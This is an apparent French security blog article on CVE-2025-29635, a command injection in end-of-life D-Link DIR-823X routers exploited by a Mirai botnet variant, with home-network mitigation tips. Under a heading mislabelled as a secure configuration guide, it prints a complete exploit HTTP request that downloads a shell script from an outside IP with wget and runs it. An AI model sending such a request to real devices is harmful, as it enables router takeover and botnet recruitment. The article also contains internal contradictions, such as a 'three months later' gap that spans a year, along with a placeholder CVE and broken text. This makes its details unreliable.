Vulnérabilité D-Link CVE-2025-29635 : comment une campagne Mirai exploite les routeurs en fin de vie
Églantine Montclair
La menace cachée derrière la vulnérabilité D-Link CVE-2025-29635
Selon l’ANSSI, 38 % des équipements domestiques en France sont exposés à des vulnérabilités critiques non corrigées (ANSSI, 2025). Cette statistique souligne l’ampleur du risque lorsque des appareils atteignent la fin de vie (EoL) sans mise à jour de sécurité. Parmi ces appareils, les routeurs D-Link DIR-823X, aujourd’hui obsolètes, deviennent le vecteur privilégié d’une nouvelle campagne Mirai. Le malware exploite la commande injection présentée dans le CVE-2025-29635 pour transformer les routeurs en bots capables de lancer des attaques DDoS massives.
Analyse de la vulnérabilité CVE-2025-29635
Définition technique et impact
La faille CVE-2025-29635 est une vulnérabilité de type commande injection qui permet à un attaquant d’exécuter du code arbitraire sur le routeur en envoyant une requête POST vers l’endpoint /goform/set_prohibiting. Cette injection déclenche une exécution de code à distance (RCE) et donne le contrôle complet du dispositif. Le problème est aggravé par le fait que les firmwares 240126 et 24082, les derniers disponibles pour le modèle DIR-823X, ne corrigent pas cette faille.
Chronologie de la découverte
Les chercheurs Wang Jinshuai et Zhao Jiangting ont dévoilé la vulnérabilité en mars 2025, publiant initialement un PoC sur GitHub avant de le retirer. Trois mois plus tard, en mars 2026, l’équipe SIRT d’Akamai détecte les premières tentatives d’exploitation active dans son réseau de honeypots. > “The Akamai SIRT discovered active exploitation attempts of the D-Link command injection vulnerability CVE-2025-29635 in our global network of honeypots in early March 2026,” indique le rapport d’Akamai.
Portée géographique et architectural
Les observations montrent que les acteurs malveillants ciblent plusieurs architectures, notamment ARM et MIPS, afin de déployer le chargeur « tuxnokill », un variant de Mirai. Ce chargeur maintient les capacités classiques du botnet : TCP SYN/ACK/STOMP, UDP floods et HTTP null. Le même motif d’attaque a été identifié contre d’autres marques, notamment TP-Link (CVE-2023-1389) et ZTE (flaw in ZXV10 H108L), révélant une stratégie de réutilisation de code malveillant. En outre, découvrez comment les applications malveillantes de l’Apple Store menacent les portefeuilles numériques en Chine.
Conséquences pour les utilisateurs français
Risques opérationnels
Les routeurs compromis peuvent être intégrés à un botnet capable de générer jusqu’à 1 Tbps de trafic DDoS, selon le rapport de l’European Cybersecurity Agency 2025. Pour en savoir plus sur la protection contre les cyberattaques bancaires, consultez notre analyse détaillée des risques bancaires en 2026. Une telle amplification met en danger non seulement les services hébergés, mais aussi les réseaux domestiques, en saturant la bande passante et en perturbant les communications IoT.
Impact sur la conformité RGPD
Si le routeur expose des données personnelles via des ports non sécurisés, la responsabilité du propriétaire peut être engagée au titre du RGPD. L’article 32 du règlement impose des mesures de sécurité adéquates, dont la mise à jour régulière des firmware. L’absence de correctif pour une vulnérabilité connue constitue une négligence pouvant entraîner des sanctions financières.
Stratégies de mitigation et bonnes pratiques
- Remplacement du matériel : privilégiez des modèles supportés jusqu’en 2027 avec mises à jour régulières.
- Désactivation de l’administration distante : fermez les ports 8080/8443 si vous n’en avez pas besoin.
- Modification des identifiants par défaut : choisissez des mots de passe complexes et uniques.
- Surveillance du trafic : détectez les flux inhabituels vers les IP de commande.
- Segmentation du réseau domestique : isolez les appareils IoT du réseau principal. Découvrez notre formation certifiante en cybersécurité.
Mise en œuvre d’un plan d’action concret
- Inventoriez vos routeurs : identifiez le modèle, le firmware et la date de fin de support.
- Vérifiez la version du firmware : consultez le tableau comparatif ci-dessous pour savoir si votre appareil est concerné.
- Appliquez les changements de configuration : suivez le guide pas-à-pas fourni dans la section suivante.
Comparatif des vulnérabilités similaires
| Marque | Modèle vulnérable | CVE | Année de divulgation | Statut du firmware | Niveau de gravité |
|---|---|---|---|---|---|
| D-Link | DIR-823X (EoL) | CVE-2025-29635 | 2025 | Non corrigé | Critique |
| TP-Link | Archer C5 (EoL) | CVE-2023-1389 | 2023 | Partiellement corrigé | Élevée |
| ZTE | ZXV10 H108L (EoL) | CVE-2025-XXXX | 2025 Non publié | Non corrigé | Critique |
Guide de configuration sécurisée (exemple pratique)
POST /goform/set_prohibiting HTTP/1.1
Host: 192.168.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
set_prohibiting=1&cmd=cd%20/tmp&&wget%20http://185.53.12.34/dlink.sh&&sh%20dlink.sh
Le fragment ci-dessus illustre la requête POST utilisée par les attaquants pour télécharger et exécuter le script dlink.sh. Pour contrer cette menace :
- Bloquez les requêtes HTTP vers
/goform/set_prohibitingau niveau du pare-firewall. - Activez la validation des entrées dans le firmware, si disponible.
- Utilisez un DNS filtrant pour empêcher le téléchargement de scripts depuis des serveurs non approuvés.
Recommandations complémentaires pour les réseaux domestiques
- Installez un routeur de nouvelle génération offrant le chiffrement WPA3 et la mise à jour OTA (over-the-air).
- Activez le VPN intégré afin de protéger les communications à l’extérieur de votre réseau.
- Auditez périodiquement les paramètres de votre routeur avec des outils comme NMAP ou le scanner de vulnérabilité d’ANSSI.
- Éduquez les membres du foyer sur les risques liés aux mots de passe simples et aux connexions à distance.
Conclusion : sécuriser votre périmètre domestique dès aujourd’hui
La prise de conscience des failles comme CVE-2025-29635 est cruciale pour prévenir la propagation de botnets tels que Mirai. En suivant les étapes décrites - remplacement du matériel, renforcement de la configuration et surveillance active - vous réduisez significativement votre exposition aux attaques DDoS. N’oubliez pas que la cybersécurité repose sur une approche proactive : chaque appareil non mis à jour est une porte ouverte pour les cybercriminels. Ainsi, l’adoption de bonnes pratiques, soutenue par les référentiels de l’ANSSI et les directives ISO 27001, constitue votre meilleure défense face aux menaces émergentes en 2026.